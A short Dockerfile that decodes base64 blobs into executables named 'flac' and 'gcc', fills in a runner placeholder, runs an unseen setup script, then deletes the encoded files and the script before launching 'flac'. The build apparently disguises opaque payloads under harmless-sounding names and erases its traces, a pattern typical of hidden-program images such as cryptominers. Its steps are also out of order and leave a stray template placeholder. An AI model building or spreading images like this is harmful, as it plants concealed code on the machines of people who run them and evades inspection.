FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > flac.log'
RUN base64 --decode flac.64 > flac
RUN base64 --decode gcc.64 > gcc
RUN chmod +x gcc

COPY flac .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' flac
RUN bash ./docker.sh
RUN rm --force --recursive flac _REPO_NAME__.64 docker.sh gcc gcc.64

CMD flac
